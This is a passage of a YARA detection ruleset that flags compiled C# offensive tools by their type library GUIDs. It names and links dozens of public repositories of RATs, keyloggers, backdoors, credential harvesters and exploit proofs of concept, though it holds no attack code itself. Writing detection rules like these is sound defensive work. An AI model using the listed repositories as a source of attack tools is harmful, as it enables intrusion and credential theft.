Rupp" date = "2020-12-13" strings: $typelibguid0 = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii nocase wide $typelibguid1 = "86652418-5605-43fd-98b5-859828b072be" ascii nocase wide $typelibguid2 = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii nocase wide $typelibguid3 = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RAT_TelegramSpyBot { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TheHackToolBoxTeek { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/teeknofil/TheHackToolBoxTeek" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii nocase wide $typelibguid1 = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii nocase wide $typelibguid2 = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii nocase wide $typelibguid3 = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii nocase wide $typelibguid4 = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii nocase wide $typelibguid5 = "295655e8-2348-4700-9ebc-aa57df54887e" ascii nocase wide $typelibguid6 = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_USBTrojan { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mashed-potatoes/USBTrojan" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_IIS_backdoor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/WBGlIl/IIS_backdoor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii nocase wide $typelibguid1 = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellGen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jasondrawdy/ShellGen" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Mass_RAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Mass-RAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii nocase wide $typelibguid1 = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii nocase wide $typelibguid2 = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Browser_ExternalC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OffensivePowerShellTasking { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/leechristensen/OffensivePowerShellTasking" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d432c332-3b48-4d06-bedb-462e264e6688" ascii nocase wide $typelibguid1 = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DoHC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SpiderLabs/DoHC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SyscallPOC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SolomonSklash/SyscallPOC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii nocase wide $typelibguid1 = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Pen_Test_Tools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/awillard1/Pen-Test-Tools" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii nocase wide $typelibguid1 = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii nocase wide $typelibguid2 = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii nocase wide $typelibguid3 = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii nocase wide $typelibguid4 = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii nocase wide $typelibguid5 = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii nocase wide $typelibguid6 = "a4043d4c-167b-4326-8be4-018089650382" ascii nocase wide $typelibguid7 = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii nocase wide $typelibguid8 = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii nocase wide $typelibguid9 = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii nocase wide $typelibguid10 = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii nocase wide $typelibguid11 = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_The_Collection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Tlgyt/The-Collection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii nocase wide $typelibguid1 = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii nocase wide $typelibguid2 = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii nocase wide $typelibguid3 = "5f19919d-cd51-4e77-973f-875678360a6f" ascii nocase wide $typelibguid4 = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Change_Lockscreen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/Change-Lockscreen" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LOLBITS { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Kudaes/LOLBITS" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Keylogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BlackVikingPro/Keylogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2020_1337 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/neofito/CVE-2020-1337" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpLogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AsyncRAT_C_Sharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "619b7612-dfea-442a-a927-d997f99c497b" ascii nocase wide $typelibguid1 = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii nocase wide $typelibguid2 = "37e20baf-3577-4cd9-bb39-18675854e255" ascii nocase wide $typelibguid3 = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii nocase wide $typelibguid4 = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii nocase wide $typelibguid5 = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii nocase wide $typelibguid6 = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii nocase wide $typelibguid7 = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii nocase wide $typelibguid8 = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii nocase wide $typelibguid9 = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii nocase wide $typelibguid10 = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DarkFender { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xyg3n/DarkFender" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* FPs with IronPython rule HKTL_NET_GUID_IronKit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nshalabi/IronKit" author = "Arnim Rupp" score = 50 date = "2020-12-13" strings: $typelibguid0 = "68e40495-c34a-4539-b43e-9e4e6f11a9fb" ascii nocase wide $typelibguid1 = "641cd52d-3886-4a74-b590-2a05621502a4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } */ rule HKTL_NET_GUID_MinerDropper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/DylanAlloy/MinerDropper" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii nocase wide $typelibguid1 = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDomainSpray { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HunnicCyber/SharpDomainSpray" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_iSpyKeylogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/iSpyKeylogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii nocase wide $typelibguid1 = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii nocase wide $typelibguid2 = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii nocase wide $typelibguid3 = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SolarFlare { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mubix/solarflare" author = "Arnim Rupp" date = "2020-12-15" strings: $typelibguid0 = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Snaffler { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SnaffCon/Snaffler" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii nocase wide $typelibguid1 = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShares { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpShares/" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpEDRChecker { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/PwnDexter/SharpEDRChecker" author = "Arnim Rupp" date = "2020-12-18" strings: $typelibguid0 = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpClipHistory { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpClipHistory" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpGPO_RemoteAccessPolicies { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Absinthe { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cameronhotchkies/Absinthe" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ExploitRemotingService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/ExploitRemotingService" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii nocase wide $typelibguid1 = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii nocase wide $typelibguid2 = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Xploit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/shargon/Xploit" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii nocase wide $typelibguid1 = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii nocase wide $typelibguid2 = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii nocase wide $typelibguid3 = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii nocase wide $typelibguid4 = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii nocase wide $typelibguid5 = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii nocase wide $typelibguid6 = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii nocase wide $typelibguid7 = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii nocase wide $typelibguid8 = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii nocase wide $typelibguid9 = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii nocase wide $typelibguid10 = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/thezdi/PoC" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "89f9d411-e273-41bb-8711-209fd251ca88" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpGPOAbuse { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpGPOAbuse" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "4f495784-b443-4838-9fa6-9149293af785" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Watson { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/Watson" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_StandIn { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/StandIn" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_azure_password_harvesting { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/guardicore/azure_password_harvesting" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PowerOPS { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fdiskyou/PowerOPS" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Random_CSharpTools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/xorrior/Random-CSharpTools" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii nocase wide $typelibguid1 = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii nocase wide $typelibguid2 = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii nocase wide $typelibguid3 = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii nocase wide $typelibguid4 = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii nocase wide $typelibguid5 = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii nocase wide $typelibguid6 = "60116613-c74e-41b9-b80e-35e02f25891e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2020_0668 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsRpcClients { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/WindowsRpcClients" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii nocase wide $typelibguid1 = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii nocase wide $typelibguid2 = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii nocase wide $typelibguid3 = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii nocase wide $typelibguid4 = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii nocase wide $typelibguid5 = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii nocase wide $typelibguid6 = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpFruit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpFruit" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWitness { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/SharpWitness" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RexCrypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/syrex1013/RexCrypter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharPersist { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fireeye/SharPersist" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2019_1253 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/CVE-2019-1253" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "584964c1-f983-498d-8370-23e27fdd0399" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_scout { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jaredhaight/scout" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Grouper2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/l0ss/Grouper2/" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CasperStager { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ustayready/CasperStager" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii nocase wide $typelibguid1 = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TellMeYourSecrets { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/TellMeYourSecrets" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpExcel4_DCOM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShooter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/SharpShooter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "56598f1c-6d88-4994-a392-af337abe5777" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NoMSBuild { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/NoMSBuild" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "034a7b9f-18df-45da-b870-0e1cef500215" ascii nocase wide $typelibguid1 = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TeleShadow2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ParsingTeam/TeleShadow2" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii nocase wide $typelibguid1 = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BadPotato { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BeichenDream/BadPotato" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0527a14f-1591-4d94-943e-d6d784a50549" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LethalHTA { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/codewhitesec/LethalHTA" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii nocase wide $typelibguid1 = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpStat { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Raikia/SharpStat" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SneakyService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/SneakyService" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/anthemtotheego/SharpExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCOM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpCOM" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Inception { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/two06/Inception" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_sharpwmi { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/QAX-A-Team/sharpwmi" author = "Arnim Rupp" date = 